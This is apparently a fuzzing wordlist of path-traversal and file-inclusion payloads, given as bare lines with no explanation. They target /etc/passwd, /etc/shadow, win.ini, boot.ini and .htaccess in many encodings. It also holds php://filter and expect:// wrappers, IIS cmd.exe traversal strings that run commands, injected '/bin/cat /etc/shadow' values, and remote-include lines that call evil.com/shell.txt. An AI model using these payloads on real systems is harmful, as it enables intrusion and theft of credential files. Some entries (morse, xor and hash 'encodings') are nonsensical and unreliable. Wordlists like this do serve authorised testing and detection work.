Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
data:text/plain;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
../../../etc/cGFzc3dk
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%2500
Li4vLi4vZXRj/cGFzc3dk
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%2500
../../../../../../../../../../../../../../../etc/passwd..............................................
../../../../../../../../../../../../../../../etc/passwd\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
../../../../../../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././.
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
..///////..////..//////..///////..////..//////..///////..////..//////..///////..////..//////..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://evil.com/shell.txt%00
http:%252f%252fevil.com%252fshell.txt
file:///../../../ZXRj/cGFzc3dk
LmRvdC4uLi9ldGMvcGFzc3dk
%4c%69%34%76%4c%69%34%76%4c%69%34%76%5a%58%52%6a%4c%33%42%68%63%33%4e%33%5a%41%3d%3d
base64:Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
b64:../../../ZXRjL3Bhc3N3ZA==
YjY0Oi4uLy4uLy4uL2V0Yy9wYXNzd2Q=
\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x650x740x630x2f0x700x610x730x730x770x64
&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x2f;&#x65;&#x74;&#x63;&#x2f;&#x70;&#x61;&#x73;&#x73;&#x77;&#x64;
2e2e2f2e2e2f2e2e2f6574632f706173737764
\u{2e}\u{2e}\u{2f}\u{2e}\u{2e}\u{2f}\u{2e}\u{2e}\u{2f}\u{65}\u{74}\u{63}\u{2f}\u{70}\u{61}\u{73}\u{73}\u{77}\u{64}
$'\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'
hex:2e2e2f2e2e2f2e2e2f6574632f706173737764
\X2E\X2E\X2F\X2E\X2E\X2F\X2E\X2E\X2F\X65\X74\X63\X2F\X70\X61\X73\X73\X77\X64
U+002EU+002EU+002FU+002EU+002EU+002FU+002EU+002EU+002FU+0065U+0074U+0063U+002FU+0070U+0061U+0073U+0073U+0077U+0064
\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x2e\\x2e\\x2f\\x65\\x74\\x63\\x2f\\x70\\x61\\x73\\x73\\x77\\x64
\056\056\057\056\056\057\056\056\057\145\164\143\057\160\141\163\163\167\144
\\056\\056\\057\\056\\056\\057\\056\\056\\057\\145\\164\\143\\057\\160\\141\\163\\163\\167\\144
\0056\0056\0057\0056\0056\0057\0056\0056\0057\0145\0164\0143\0057\0160\0141\0163\0163\0167\0144
oct:056056057056056057056056057145164143057160141163163167144
$'\056\056\057\056\056\057\056\056\057\145\164\143\057\160\141\163\163\167\144'
%5c056%5c056%5c057%5c056%5c056%5c057%5c056%5c056%5c057%5c145%5c164%5c143%5c057%5c160%5c141%5c163%5c163%5c167%5c144
\0o56\0o56\0o57\0o56\0o56\0o57\0o56\0o56\0o57\0o145\0o164\0o143\0o57\0o160\0o141\0o163\0o163\0o167\0o144
&#056;&#056;&#057;&#056;&#056;&#057;&#056;&#056;&#057;&#145;&#164;&#143;&#057;&#160;&#141;&#163;&#163;&#167;&#144;
\o{56}\o{56}\o{57}\o{56}\o{56}\o{57}\o{56}\o{56}\o{57}\o{145}\o{164}\o{143}\o{57}\o{160}\o{141}\o{163}\o{163}\o{167}\o{144}
O'056056057056056057056056057145164143057160141163163167144'
001011100010111000101111100101110001011100101111100101110001011100101111100110010101110100011000110010111110011100000110000101110011011100110111011101100100
bin:001011100010111000101111100101110001011100101111100101110001011100101111100110010101110100011000110010111110011100000110000101110011011100110111011101100100
\b00101110\b00101110\b00101111\b00101110\b00101110\b00101111\b00101110\b00101110\b00101111\b01100101\b01110100\b01100011\b00101111\b01110000\b01100001\b01110011\b01110011\b01110111\b01100100
binary:001011100010111000101111100101110001011100101111100101110001011100101111100110010101110100011000110010111110011100000110000101110011011100110111011101100100
2E2E2F2E2E2F2E2E2F6574632F706173737764
0b001011100010111000101111100101110001011100101111100101110001011100101111100110010101110100011000110010111110011100000110000101110011011100110111011101100100
00101110.00101110.00101111.00101110.00101110.00101111.00101110.00101110.00101111.01100101.01110100.01100011.00101111.01110000.01100001.01110011.01110011.01110111.01100100
%30%30%31%30%31%31%31%30%30%30%31%30%31%31%31%30%30%30%31%30%31%31%31%31%30%30%31%30%31%31%31%30%30%30%31%30%31%31%31%30%30%30%31%30%31%31%31%31%30%30%31%30%31%31%31%30%30%30%31%30%31%31%31%31
\B00101110\B00101110\B00101111\B00101110\B00101110\B00101111\B00101110\B00101110\B00101111\B01100101\B01110100\B01100011\B00101111\B01110000\B01100001\B01110011\B01110011\B01110111\B01100100
bin2hex:2e2e2f2e2e2f2e2e2f6574632f706173737764
../_rqp/cnffjq
rot13:../../../rgp/cnffjq
caesar3:../../../hwf/sdvvzg
rot47:../../../6E4L5:II<5
../../../%72%6f%74%31%33%3a%63%6e%66%66%6a%71
../../../&rot13;cnffjq
ROT13(../../../etc/passwd) = ../../../rgp/cnffjq
caesar-13:../../../rgp/cnffjq
../../../6E4/A2DD<5
shift13:../../../rgp/cnffjq
xor42:../../../%2a%2a%28%14%2a%2a%28%14%2a%2a%28%14%07%1c%05%14%12%03%11%11%15%06
../../../xor0x42:%07%1c%05%12%03%11%11%15%06
key=AA:../../../%0f%1f%0e%1e%1e%05%07
../../../%xor%41%42%43%etc%passwd
xorkey123:../../../%66%75%60%1f%71%60%72%72%76%65
../../../^42etc^42passwd
xorpad:../../../%2a%2a%28%ae%2a%2a%28%ae%2a%2a%28%ae%63%70%61%28%ae%76%65%77%77%71%60%ae
../../../⊕42:etc⊕42:passwd
xor_cipher:../../../%07%1c%05%14%12%03%11%11%15%06
key0xFF:../../../%d1%d4%d2%9a%d0%d9%8e%8e%88%9b
morse:.-.-.-/.-.-.-/.-.-.-/./-.-./-.-./.--./.--./.-../../.../-.-.././--/.-.
../../../%morse%.-/-.-./.-./.-./../.--./.-../../.../-.-.././--/.-.
telegraph:DOTDOTDASH/DOTDOTDASH/DOTDOTDASH/DOT/DASHDOTDOT/DASHDOTDOT/DOTDASHDOTDOT/DOTDASHDOTDOT/DOTDOTDOT/DOTDOTDOT/DOTDOTDOT/DASHDOTDASH/DOTDOTDOT/DASHDOTDASH/DOTDOTDOT/DOTDASHDOT
../../../%2e-%2e-%2e-/%2e-%2e-%2e-/%2e-%2e-%2e-/%2e/-%2e-%2e/-%2e-%2e/%2e--%2e/%2e--%2e/%2e%2e%2e/%2e%2e%2e/%2e%2e%2e/-%2e-%2e/%2e%2e%2e/-%2e-%2e/%2e%2e%2e/%2e--%2e
dit-dah:../../../%dit%dit%dah/%dit%dit%dah/%dit%dit%dah/%dit/%dah%dit%dit/%dah%dit%dit/%dit%dah%dit%dit/%dit%dah%dit%dit/%dit%dit%dit/%dit%dit%dit/%dit%dit%dit/%dah%dit%dah/%dit%dit%dit/%dah%dit%dah/%dit%dit%dit/%dit%dah%dit
morse_url:../../../etc%2fmorse%3a%2e%2d%2e%2d%2e%2d%2f%2e%2d%2e%2d%2e%2d%2f%2e%2d%2e%2d%2e%2d
../../../%E%T%C%2F%P%A%S%S%W%D
telegraphic:DOTDOTDASHDIVDOTDOTDASHDIVDOTDOTDASHDIVDOTDIVDASHDOTDOTDIVDASHDOTDOTDIVDOTDASHDOTDOTDIVDOTDASHDOTDOTDIVDOTDOTDOTDIVDOTDOTDOTDIVDOTDOTDOTDIVDASHDOTDASHDIVDOTDOTDOTDIVDASHDOTDASHDIVDOTDOTDOTDIVDOTDASHDOT
../../../&morse;.-.-.-&div;.-.-.-&div;.-.-.-&div;.&div;-.-.&div;-.-.&div;.--.&div;.--.&div;...&div;...&div;...&div;-.-.&div;...&div;-.-.&div;...&div;.--.
morse_encoded:%2e%2d%2e%2d%2e%2d%2f%2e%2d%2e%2d%2e%2d%2f%2e%2d%2e%2d%2e%2d%2f%65%74%63%2f%70%61%73%73%77%64
xn--../../../etc/passwd
punycode:xn--.-.-hd6apa../../../etc/passwd
../../../xn--tc-gka/xn--asswd-5qa2b
idna:../../../%78%6E%2D%2D%65%74%63%2D%2D%70%61%73%73%77%64
../../../&punycode;etc&punycode;passwd
idn_encode:../../../%xn--etc--%xn--passwd--
puny:../../../xn--tc-8ka/xn--asswd-rma3c
../../../%punycode%etc%passwd
internationalized:../../../хn--etc--/хn--passwd--
xn--hd6a../../../etc/passwddata:text/plain,../../../etc/passwd
data:application/octet-stream;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
data:text/plain;charset=utf-8,../../../etc/passwd
file:///data:text/plain,../../../etc/passwd
data:text/html,<script>location='../../../etc/passwd'</script>
../../../etc/data:text/plain,passwd
mime:text/plain:../../../etc/passwd
data:application/x-www-form-urlencoded,..%2F..%2F..%2Fetc%2Fpasswd
content-type:text/plain;../../../etc/passwd
data:multipart/form-data;boundary=123,../../../etc/passwd
md5:../../../etc/5d41402abc4b2a76b9719d911017c592
sha1:../../../etc/aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
crc32:../../../etc/811c9dc5
../../../etc/hash:passwd
bcrypt:../../../etc/$2b$10$N9qo8uLOickgx2ZMRZoMye
../../../etc/sha256:5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
hmac:../../../etc/passwd:key123
pbkdf2:../../../etc/passwd$salt$10000
../../../etc/argon2:passwd$v=19$m=4096,t=3,p=1$salt
scrypt:../../../etc/passwd$16$8$1$salt
php:expect://id
php:expect://ls
php://filter/read=string.rot13/resource=index.php
php://filter/convert.base64-encode/resource=index.php
php://FilTer/convert.base64-encode/resource=index.php
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%2f..%2f..%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e\%2e%2e\%2e%2e\etc\passwd
%25252e%25252e%25252f%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
%2525252e%2525252e%2525252f%2525252e%2525252e%2525252f%2525252e%2525252e%2525252fetc%2525252fpasswd
%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd
%25252e%25252e%25255c%25252e%25252e%25255c%25252e%25252e%25255cetc%25255cpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%2e%c0%2e%2f%c0%2e%c0%2e%2f%c0%2e%c0%2e%2fetc%2fpasswd
%c1%8e%c1%8e%c1%af%c1%8e%c1%8e%c1%af%c1%8e%c1%8e%c1%afetc%c1%afpasswd
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fetc%c0%2fpasswd
%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd
%c1%9c%c1%9c%c1%af%c1%9c%c1%9c%c1%af%c1%9c%c1%9c%c1%afetc%c1%afpasswd
\u002e\u002e\u002f\u002e\u002e\u002f\u002e\u002e\u002fetc\u002fpasswd
\u002e\u002e\u005c\u002e\u002e\u005c\u002e\u002e\u005cetc\u005cpasswd
%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002fetc%u002fpasswd
%uff0e%uff0e%uff0f%uff0e%uff0e%uff0f%uff0e%uff0e%uff0fetc%uff0fpasswd
％２ｅ％２ｅ％２ｆ％２ｅ％２ｅ％２ｆ％２ｅ％２ｅ％２ｆｅｔｃ％２ｆｐａｓｓｗｄ
%ef%bc%8e%ef%bc%8e%ef%bc%8f%ef%bc%8e%ef%bc%8e%ef%bc%8f%ef%bc%8e%ef%bc%8e%ef%bc%8fetc%ef%bc%8fpasswd
%c0%ae%c0%ae%e2%81%84%c0%ae%c0%ae%e2%81%84%c0%ae%c0%ae%e2%81%84etc%e2%81%84passwd
..%u2215..%u2215..%u2215etc%u2215passwd
%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc%u2215passwd
..\\..\\..\\..\\..\\..\\..\\..\\..\\/etc/passwd
../..\\../../..\\../etc\\passwd
..\\../..\\../..\\../..\\../..\\../..\\../etc/passwd
..////..////..////..////..////..////etc////passwd
..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\etc\\\\passwd
../\../\../\../\../\../\etc/\passwd
..\/../..\/../..\/../..\/../..\/../..\/../etc/passwd
..//\\..//\\..//\\etc//\\passwd
..\/..\/..\/..\/..\/..\/etc\/passwd
..\\//..\\//..\\//..\\//..\\//..\\//etc\\//passwd
./////./////.////./////./////.////etc////passwd
.\\\\\.\\\\\.\\\\.\\\\\.\\\\\.\\\\etc\\\\passwd
.///////.///////.//////etc///////passwd
.\\\\\\\.\\\\\\\.\\\\\\\etc\\\\\\\passwd
./././././././etc/./passwd
.\.\.\.\.\.\.\etc\.\passwd
.////.\\\\.//.\\etc//.\\passwd
.////////////////////etc////////////////////passwd
.\\\\\\\\\\\\\\\\\\\\\\\\\\\\etc\\\\\\\\\\\\\\\\\\\\\\\\\\\\passwd
./\/\/\/\/\/\/\/\/\/etc\/\/passwd
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
../../../etc/passwd%00.txt
../../../etc/passwd%00.pdf
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00.xml
../../../etc/passwd%00%00.html
../../../etc/passwd\x00.css
../../../etc/passwd%c0%80.js
../../../etc/passwd%e0%80%80.zip
../../../etc/passwd%00%0a.log
../../../ETC/passwd
../../../etc/PASSWD
../../../Etc/Passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fETC%2fPASSWD
../../../EtC/pAsSwD
..\\..\\.\\ETC\\PASSWD
%2E%2E%2F%2E%2E%2F%2E%2E%2FETC%2FPASSWD
../../../eTc/pAsSWd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetC%2fpassWD
..\\..\\.\\etC\\passWD
..././..././..././etc/passwd
...\....\....\etc\passwd
....//....//....//etc//passwd
....\\\\....\\\\....\\\\etc\\\\passwd
..;/..;/..;/etc/passwd
..%3b/..%3b/..%3b/etc/passwd
../$/..$/..$/etc/passwd
..?/..?/..?/etc/passwd
..%3f/..%3f/..%3f/etc/passwd
../&../&../&etc/passwd
%c0%bc%c0%bc%c0%af%c0%bc%c0%bc%c0%af%c0%bc%c0%bc%c0%afetc%c0%afpasswd
%c1%9c%c1%9c%c1%9f%c1%9c%c1%9c%c1%9f%c1%9c%c1%9c%c1%9fetc%c1%9fpasswd
%e0%80%ae%e0%80%ae%e0%81%9f%e0%80%ae%e0%80%ae%e0%81%9f%e0%80%ae%e0%80%ae%e0%81%9fetc%e0%81%9fpasswd
%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%afpasswd
&#46;&#46;&#47;&#46;&#46;&#47;&#46;&#46;&#47;etc&#47;passwd
&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x2f;etc&#x2f;passwd
&#046;&#046;&#047;&#046;&#046;&#047;&#046;&#046;&#047;etc&#047;passwd
%26%2346%3b%26%2346%3b%26%2347%3b%26%2346%3b%26%2346%3b%26%2347%3betc%26%2347%3bpasswd
&period;&period;&sol;&period;&period;&sol;&period;&period;&sol;etc&sol;passwd
%2eperiod%2eperiod%2fsol%2eperiod%2eperiod%2fsol%2eperiod%2eperiod%2fsoletc%2fsolpasswd
..%252f..%252f..%252fetc%252fpasswd%00
%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afpasswd%00.png
..%5c..%5c..%5cetc%5cpasswd%00.jpg
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%2500.txt
..%c1%1c..%c1%1c..%c1%1cetc%c1%1cpasswd%c0%80.xml
%2e%2e%e2%81%84%2e%2e%e2%81%84%2e%2e%e2%81%84etc%e2%81%84passwd%00%0d%0a.html
../..%c0%af..%c0%afetc%c0%afpasswd%c0%80%00.css
%c0%ae%c0%ae%252f%c0%ae%c0%ae%252f%c0%ae%c0%ae%252fetc%252fpasswd%2500%250a.js
..%u2215..%u2215..%u2215etc%u2215passwd%00%u0000.zip
%ef%bc%8e%ef%bc%8e%ef%bc%8f%ef%bc%8e%ef%bc%8e%ef%bc%8f%ef%bc%8e%ef%bc%8e%ef%bc%8fetc%ef%bc%8fpasswd%c0%80%00%0a%0d.log
....//....//etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd\.\.\.\.\.\./\.\.\.\.\.\./\.\.\.\.\.\./\.\.\.\.\.\./etc/passswd
../../.././../.././../.././../../etc/passwd/././././././/././././././/././././././/././././././etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
..///////..////..//////..///////..////..//////..///////..////..//////..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
....//....//....//etc/passwd
....\/....\/....\/....\/etc/passwd
....////....////....////etc/passwd
//….//….//….//….//etc/passwd
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
